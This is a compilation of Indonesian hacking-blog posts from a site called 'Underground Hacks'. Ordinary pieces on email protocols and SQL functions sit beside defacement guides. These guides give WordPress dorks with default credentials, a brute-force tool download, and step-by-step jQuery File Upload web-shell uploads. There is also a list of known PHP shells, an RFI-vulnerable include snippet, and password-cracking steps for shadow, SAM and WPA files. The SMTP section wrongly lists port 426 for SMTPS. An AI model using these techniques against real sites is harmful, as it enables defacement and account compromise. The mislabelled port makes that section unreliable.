Pengertian SMTP, POP3, dan IMAP pada Layanan Email

 


Pengertian Protokol pada Email

Sebelum membahas SMTP, POP3 dan IMAP, Anda perlu mengetahui terlebih dahulu apa itu protokol.

Ketika komputer berkomunikasi dengan komputer lain, perlu adanya sebuah aturan dan instruksi yang diikuti oleh setiap komputer. Istilah ini dinamakan dengan protokol.

Protokol yang akan kami ulas di sini fungsinya berhubungan dengan pengiriman serta penerimaan email yaitu SMTP, POP3, dan IMAP. Di bawah ini adalah penjelasan dari masing-masing protokol tersebut.

Pengertian SMTP dan POP3

Sebelum masuk ke pembahasan IMAP, Anda akan mendapatkan penjelasan mengenai SMTP dan port defaultnya berikut.

Apa Itu SMTP?

Simple Mail Transfer Protocol atau SMTP adalah suatu protokol untuk berkomunikasi dengan server guna mengirimkan email dari lokal email ke server, sebelum akhirnya dikirimkan ke server email penerima. Proses ini dikontrol dengan Mail Transfer Agent (MTA) yang ada dalam server email Anda.

Port SMTP Default

  • Port 25 –  Port tanpa dienkripsi
  • Port 426 – Port SSL/TLS, nama lainnya SMTPS

Pengertian POP3

POP3 (Post Office Protocol 3) adalah versi terbaru dari protokol standar untuk menerima email. POP3 merupakan protokol client/server dimana email dikirimkan dari server ke email lokal. Digunakan untuk berkomunikasi dengan email server dan mengunduh semua email ke email lokal (seperti Outlook, Thunderbird, Windows Mail, Mac Mail, dan sebagainya), tanpa menyimpan salinannya di server. Biasanya, dalam aplikasi email terdapat pilihan untuk tetap menyimpan salinan email yang diunduh pada server atau tidak.

Apabila Anda mengakses akun email yang sama dari perangkat berbeda, kami sangat merekomendasikan Anda untuk menyimpan backup. Hal ini perlu dilakukan sebagai langkah antisipasi, semisal perangkat kedua tidak mengunduh email, sementara perangkat pertama sudah menghapusnya.

POP3 adalah protokol komunikasi satu arah, yang artinya data diambil dari server dan dikirimkan ke email lokal di perangkat komputer Anda.

Port POP3 Default

  • Port 110 – Port tanpa dienkripsi
  • Port 995 – Port SSL/TLS, nama lainnya POP3S

Kelebihan Menggunakan POP3

  • Ketika email sudah diunduh melalui aplikasi local mail di komputer, Anda tidak perlu terhubung ke internet apabila Anda ingin membukanya kembali.
  • Kebanyakan tidak ada ukuran limit untuk email yang dikirim dan diterima.
  • Dapat membuka file attachment dengan cepat .
  • Tidak ada ukuran maksimal untuk mailbox, kecuali harddisk komputer Anda penuh.

Kekurangan Menggunakan POP3

  • Jika JavaScript pada email reader diaktifkan, email phishing dengan embed JavaScript dapat terbaca di email.
  • Semua pesan akan disimpan di komputer. Hal ini dapat mengurangi space pada harddisk komputer.
  • Semua file attachment diunduh dan disimpan dalam komputer. Karenanya, potensi komputer terinfeksi virus dari email lebih besar.
  • Folder email terkadang hilang. Jika ini yang terjadi, upaya restore cukup sulit dilakukan.

Pengertian IMAP dan Perbedaannya dengan POP3

IMAP (Internet Message Access Protocol), seperti halnya POP3, juga digunakan untuk mengirimkan email ke local mail, hanya saja terdapat sedikit perbedaan cara kerja.

IMAP adalah merupakan protokol komunikasi dua arah sebagai perubahan yang dibuat pada local mail yang dikirimkan ke server. Pada dasarnya, isi email tetap berada di server. Protokol IMAP lebih direkomendasikan oleh penyedia email seperti Gmail dibandingkan menggunakan POP3.

Dalam IMAP, email disimpan di server. ketika Anda akan mengecek email, local mail akan menghubungi server untuk menampilkan pesan email. Sehingga untuk file pesan email tetap berada di server dan tidak didownload ke email lokal.

Port IMAP Default

  • Port 143 – Port tanpa dienkripsi
  • Port 993 – Port SSL/TLS, nama lainnya IMAPS

Kelebihan Menggunakan IMAP

  • Anda dapat mengakses email dari mana saja melalui perangkat berbeda.
  • Email dapat diakses melalui web browser tanpa aplikasi email.
  • Anda hanya mengunduh pesan yang ingin dibuka, sehingga tidak perlu menunggu semua pesan diunduh.
  • Attachment tidak secara otomatis diunduh oleh IMAP, sehingga email dapat diakses lebih cepat. Anda juga dapat memilih attachment tertentu yang ingin Anda buka.

Banyaknya pengguna mobile dewasa ini mengakibatkan IMAP lebih banyak digunakan. Hal ini dikarenakan file dari pesan email tersimpan dalam server dan Anda hanya tinggal mengaksesnya saja.

Kekurangan Menggunakan IMAP

  • Ada beberapa layanan hosting yang tidak mendukung IMAP.
  • Email disimpan pada server sehingga mengurangi disk space hosting.
  • Email dengan IMAP hanya dapat diakses ketika terkoneksi internet.

Kesimpulan

Kami berharap saat ini Anda lebih memahami tentang protokol pada email dan port yang digunakan dengan sedikit penjelasan mengenai pengertian SMTP, POP3 dan IMAP. Anda juga telah mengetahui bahwa POP3 maupun IMAP pada dasarnya memiliki fungsi yang sama, dan hanya memiliki sedikit perbedaan saja.

Dalam IMAP, konten email disimpan di server. Sementara itu, POP3 mengunduh semua email ke komputer. Di samping itu, kami juga telah membahas port default untuk SMTP, POP3 dan IMAP

Deface Wp Default



 Halo Gan balik lagi sama Mimin 

Kali ini Mimin bagi dork + xploit + exsk u&p

Langsung aja kg usah banyak ngetik cape gw 

###############

Dork: intitle:"My Blog - My Wordpress Blog" site:.id

intitle:"Hello World " intext:2020

inurl:/wp/

intitle:"Wordpress" site:.id


User: admin

Password: pass


Xploit login: /[patch]/wp-login.php

/wp-login.php

/wp-admin/wp-login.php


Cukup kan...

Ya sudah Mimin offline dulu:(

Next time gusy....

TOOLS XMLRPC-BRUTEFORCE NEW VERSI x64_2_9_16

 


Halo balik lagi sama Mimin kali ini Mimin bakal kasih tools ngehex Yaitu Tools Xmlr-Pc BruteForce gunanya buat deface gusy oiya nih langsung aja Mimin kasih 

Download Here:

https://www.mediafire.com/file/9s110u5ai8b7lgq/Xmlrpc.zip/file

Oiya gusy kalo mau Copas  Artikel ini copas aja tapi titipkan Link web kami / refrensi biar kita juga ada kenaikan view๐Ÿ˜Œ๐Ÿคธ๐Ÿคธ wkwkwkkw 


Ok kayaknya Mimin tidur dulu deh sudah malam Babay 

Next Time --

Template Blogger XML Free | LinkMagz-v.1.8.0

 


Halo sobat blogger saya Hadid, kali ini saya bakalan bagi sesuatu ke temen temen nih... Apa hayo... Hehehehe sesuai di judul ya temen temen ๐Ÿ˜Œ 


Jadi template blogger yang bernama LinkMagz dari versi pertama Sampai yang terbaru itu adalah andalan para blogger ya temen-temen selain mimin juga suka dengan template itu mimin bakalan bagi nih template LinkMagz-v.1.8.0, gak hanya 1 tema ya temen temen 


Langsung aja yang mau download mimin kasih link nya nih, mimin baik kan๐Ÿ‘‰๐Ÿ‘ˆ wkwkwkwkw 

Download nya gak ribet kok kasihan klo pake redirect kebanyakan Mimin kasih yang simpel aja takutnya situ lagi buru buru๐Ÿ˜Œ

Download here: 

https://drive.google.com/file/d/1h3jjiHLZEXdWRlHZOqNoRN1A9My0cANp/view

Ok linknya di atas ya.. 

Kayaknya sudah sampe sini dulu deh temen temen soalnya udah mau solat isya, wkwkwkw sudah dulu temen temen 

Next time --

Deface Poc jQuery file upload (JFU)


[•]Deface jQuery file upload [•]

Time: Kamis,24, Desember

Author: HdID

Type: deface & xploiting

#################

Dork: 

-"jQuery file Upload Demo jQuery file Upload"

-inurl: server/php/

Xploit: /server/php/

Vuln?: {"files":[]}

Csrf online :cari di google 

 #############################

1.DORKING DULU 

2.KLO UDH NEMU LU KASIH EXPLOIT CONTOH (cominiweb.com/jQuery-file-upload/server/php  (klo vuln bakal muncul  {"files":[]} tapi gak mesti bisa up file!)

3.buka csrf masukin web lu trus post file lu isi ( files[] )

4. Lalu up sc/Shell lu 

5.cara akses lu Tigal tambahin path di belakang web contoh /files/sc.php 


Ok paham? Tq udh mampir

Cara Reset Password Root di Ubuntu ( OLD METHOD )

Jika lupa password login di Ubuntu atau distro Linux berbasis Debian, kita dapat meresetnya dengan mudah. Tidak perlu menggunakan Live USB apalagi sampai harus inul (install ulang). Cukup dengan menggunakan menu Recovery Mode yang terdapat pada boot menu.

1. Pada saat boot pilih menu recover mode

2. Pada Recovery menu pilih root

3. Ketik perintah di bawah ini

Baris 1 : mounting ulang partisi root dengan menambah opsi read-write

Baris2 : melihat username yang terdapat pada ubuntu

Baris 4 : mengganti password dari musaamin

Baris 7 : informasi bahwa password telah dirubah

Selain di Ubuntu saya juga sudah mencobanya di BlankOn.

PHP Security : Shell Injection


Selain sql injection, salah satu jenis serangan lainnya yang perlu di ketahui dan diantisipasi bagi web developer adalah berupa web shell injection. Nah, apa itu Web shell injection ?

Web shell ini merupakan kumpulan script  yang dapat mengeksekusi perintah shell. Setiap web shell bentuknya berbeda-beda tergantung dari web server itu sendiri. Misal, jika web servernya apache maka web shell nya berbentuk script PHP dan bentuk script shell nya dikenal dengan PHP shell injection.

PHP shell injection adalah sebuah tindakan untuk melakukan eksploitasi terhadap celah keamanan sebuah website dengan cara menginjeksi Shell hasil pengkodean bahasa PHP terhadap file yang terdapat pada website tersebut yang memiliki kelemahan ataupun kesalahan pemrograman/pengkodean

web-shell-php-injection

Contoh shell yang sudah jadi dan beredar di dunia maya, diantaranya yaitu :

b374k (indonesia)

dQ99-shell

c99 (rusia)

r57

phpShell

itsecteam-shell

Bypass

safeOver

phpShell

itsecteam-shell

Tyrag-Bypass

c100

ASPx

CMD-aspshell

CWShell-Dumper

CGI-Shell

Cara menjalankan web shell, file tersebut harus di sisipkan terlebih dahulu di web server  dalam direktori target. Salah satu, metode upload file adalah Remote File Inclusion atau dikenal dengan disingkat RFI.

Cerita singkat Remote File Inclusion. RFI merupakan metode untuk mengeksploitasi web dengan memanfaatkan file yang sudah ada pada file tersebut untuk mengeksekusi file yang diluar web.

Gambaran contoh sederhananya adalah sebagai berikut. Ada sebuah web yang proses eksekusinya menggunakan satu file yang memanggil file yang lain untuk melengkapinya melalui alamat web, seperti berikut :

http://www.target-web.com/?page=artikel.php

pada alamat diatas, tulisan artikel.php, adalah file php yang akan di masukan kedalam script php untuk di proses. kodenya bisa seperti ini.

<?php

$page=$_GET[“page”];

if($page==””){

include “home.php”;

}

include $page.”.php”;

?>

cerita selanjutnya perintah script php di artikel.php akan di eksekusi di dalam kode tersebut. permasalahan cara diatas adalah memungkinkan orang lain untuk memasukan kode selain artikel.php, isinya bebas.

Teman dari RFI adalah LFI atau Local File Inclusion, yaitu hampir sama dengan RFI, namun bedanya RFI memanfaatkan file diluar web, sedangkan LFI memanfaatkan file yang sudah tersimpan di internal server seperti file sistem  /etc/passwd untuk untuk system operasi linux.

Bagaimana cara untuk melindungi web dari serangan RFI atau LFI ? antisipasi untuk menangkal serang ini diantaranya adalah dengan script yang terupdate, lalu pastikan php.ini register_globals dan allow_url_fopen dinonaktifkan.

Setelah berhasil di simpan di direktori server, maka hacker bisa memanggilnya dengan cara mengakses file tersebut melalui browser, contoh pemanggilannya :

http://www.target-web.com/c99.php

http://www.target-web.com/  — alamat domain target

c99.php — file php shell injection

Terlihat cukup mudah, namun butuh latihan untuk dapat melakukannya.

John The Ripper Full Tutorial (Linux,windows,hash,wifi handshake cracking)


John The Ripper Full Tutorial 


john the ripper is an advanced password cracking tool used by many which is free and open source. John the Ripper initially developed for UNIX operating system but now it works in Fifteen different platforms.

John The Ripper widely used to reduce the risk of network security causes by weak passwords as well as to measure other security flaws regarding encryptions. John The Ripper uses a wide variety of password cracking techniques against user accounts of many operating systems, password encryptions, and hashes.
such as crypt password hash types( MD5, DES or Blowfish).
Windows NT/XP/2000/2003/LM hash.

Also, Password stored in MySQL, LDAP, and others.
John The Ripper is a combination of the number of password crackers in one package makes it one of the best password testing and breaking program which autodetects password hashes and customizable password cracker.

John the Ripper has an official free version, a community enhanced version, and also a pro version.

In this tutorial, we will see the most common password cracking like Linux password, Zip file protected with a password, Windows password, and Wifi Handshake file cracking.

Installing and Downloading John the Ripper.
first, we need to install John The Ripper,
it comes preinstalled in Kali Linux 
to install in other Linux Os simply use command.

# sudo apt-get install john 

For Windows, Mac and Android go to the official site of JTR 
Type John in terminal to see options.


Cracking Linux user Passwords: 
 Cracking Linux password in John The Ripper also called as unshadowing because Linux passwords are saved in Shadow files which located in

      /etc/shadow
so cracking Linux password or unshadow password simply use this command in John The Ripper.

# john /etc/shadow


As you can see John cracked the password in the shadow file.
This process sometimes takes time depending upon password complexity and the number of users. 

 -------XXX-------
Decrypting MD5 hash: 
There are lots of hash types of present over the internet but we are going to use MD5 in this article MD5 hash is a new type of encryption now widely used so let's crack the hash.
 first, we need to store the hash in .txt file which can then accessible for john the ripper using the command.

 I stored MD5 hash in MD5hash.txt and used this command.

# john --format=raw-MD5 /root/Desktop/MD5hash.txt


So John cracked the hash successfully and also correctly.


You can also decrypt other hashes like MD5 just changing command of hash format.

 ---------XXX--------

 Cracking password protected Zip/RAR file: 
 Zip/RAR file is the most commonly used password protection to files and is widely used. we many times stumbled upon password-protected ZIP file which has lots of valuable data in it. So here we will crack the Zip file password in Kali Linux.
 Lots of Folks Asking about how to create password protected file in Linux, So let's cover them up also.

First select file which you want to password encrypted and right-click on it and select Create Archive.


After that select which compression you want to choose we will ZIP which is way bottom in there.


Now, Click on other options where you can see the password field type password you want and click on create. 


So this is how you can create a password-protected ZIP file in Kali Linux. 

 We created a password-protected Zip file now we will Decrypt it using John The Ripper.

Firstly we need to Export hashes to .txt file using this command.


# zip2john [Zipfile]>zipfile.txt
 
This command will export zip keys to .txt file which we will feed to John The Ripper. in my case.


It's okay if this shows that, if you check zipfile.txt or cat it you will see their zip keys are exported successfully.

Now use this command to crack those keys in john.

# john --format=zip [zip.txt]


As you can see the password is decrypted successfully.

If you want to crack a password of RAR compression then Use the command.

# rar2john [zipfile]>zipkey.txt

 -------XXX--------
Cracking windows user password:
Windows password is stored in SAM and SYSTEM files located in

C:\Windows\System32\Config


Just copy these files using CMD type these commands


reg save hklm\SYSTEM     (for SYSTEM file)

reg save hklm\SAM      (for SAM file)

Now take this files in Kali Linux and need to extract Windows keys so we can crack them use this command

# samdump2 SYSTEM SAM>keys.txt

Details of windows users password will be saved in keys.txt and now we can feed it to John the ripper so it can crack it.

# john --format=LM --user=administrator keys.txt

you can choose the username you want to crack simply specify there instead of an administrator. and john will crack those passwords for you.

If you want to use a custom wordlist then use this command.

# john --wordlist=[wordlist.txt] --user=administrator keys.txt


----------XXX----------

Cracking WPA/WPA2 handshake using John The Ripper.

Here I will only show you how to crack WPA/WPA2 handshake not to capture it. (that's for another day)

The captured handshake must be in .hccap file it not then convert it.

now use this command to export keys in a handshake.
# hccap2john [capture]>keys.txt
now keys will be exported to keys.txt so we will crack this handshake using a custom wordlist.
use this command.
# john --wordlist=[wordlist.txt] /keys.txt
and john will start cracking process, a succession of attack depends upon password must be present in wordlist if that wordlist was not worked try a different one.

---------XXX------------

This is how you can crack various password hashes, encryptions, and user passwords using John the Ripper.

Conclusion:

These are the most common password encryptions you will encounter many times in your experience with hacking and penetration testing and john the ripper is here to help you with every one of them. you will get pretty much ideas about how to crack other password encryptions using John The Ripper.

sometimes it takes too much time to crack a password or it gets failed of password not found in many cases than using custom wordlists can help you here but the cracking password is dependent upon password complexity and a number of character used. 
  Such as using variables like (!@#$%^&*_<>)  and combining it with lowercase and uppercase with more than 12 characters long passwords can make password cracking insanely difficult.

Channel Tv nasional Indonesia NET.tv di hack?!!

Channel Tv nasional Indonesia NET.tv di hack hacker muncul tampilan hitam dan logo 

Laporan ini kami dapatkan pada pukul (7:09pagi Sabtu,5 Desember 2020)

"sebuah kata kata yang muncul dalam tampil"

" -=[ Hacked By AstarGanz]=-
We Are :
* Noname
* KingLeaf
* Ardi-Jr
* Boy Darknet
* Qimaq Draknet
* AstarGanz!
* Mr.F
* Qwerty
* JackDavis


Indonesia Cyber Mafia - Devil Union Hurted - Xploiters Team
"Ku Bisa Engkau Pun Bisa Melupakan Kebencian Yang Ada! "

Namun tidak hanya domain utama saja melainkan subdomain dari web tersebut juga di hack dengan tampilan yang sama

Berikut hasil yang sudah kami telusuri

https://netmedia.co.id/
https://news.netmedia.co.id/
https://account.netmedia.co.id/
https://smart.netmedia.co.id/

Sekian news hacking kali ini 
Saya hanya menginfokan 
Sampai jumpa...

Mengenal Fungsi-Fungsi di SQL (SQL Function)

SQL memiliki banyak fungsi bawaan untuk melakukan pemrosesan pada data string atau numerik. Berikut adalah daftar semua fungsi built-in SQL yang dapat kita gunakan

Fungsi SQL COUNT - Fungsi agregat SQL COUNT digunakan untuk menghitung jumlah baris dalam tabel database.

Fungsi SQL MAX - Fungsi agregat SQL MAX memungkinkan kita memilih nilai tertinggi (maksimum) untuk kolom tertentu.

Fungsi SQL MIN - Fungsi agregat SQL MIN memungkinkan kita untuk memilih nilai terendah (minimum) untuk kolom tertentu.

Fungsi SQL AVG - Fungsi agregat SQL AVG memilih nilai rata-rata untuk kolom tabel tertentu.

Fungsi SQL SUM - Fungsi agregat SQL SUM memungkinkan pemilihan total untuk kolom numerik.

Fungsi SQL SQRT - Ini digunakan untuk menghasilkan akar kuadrat dari bilangan tertentu.

Fungsi SQL RAND - Ini digunakan untuk menghasilkan nomor acak menggunakan perintah SQL.

Fungsi SQL CONCAT - Ini digunakan untuk menggabungkan string apa pun di dalam perintah SQL apa pun.

Fungsi Numerik SQL - Fungsi SQL yang diperlukan untuk memanipulasi angka dalam SQL.

Fungsi String SQL - Fungsi SQL yang diperlukan untuk memanipulasi string dalam SQL.

- Copyright © Underground Hacks - Blogger Templates - Powered by Blogger - Designed by Johanes Djogan -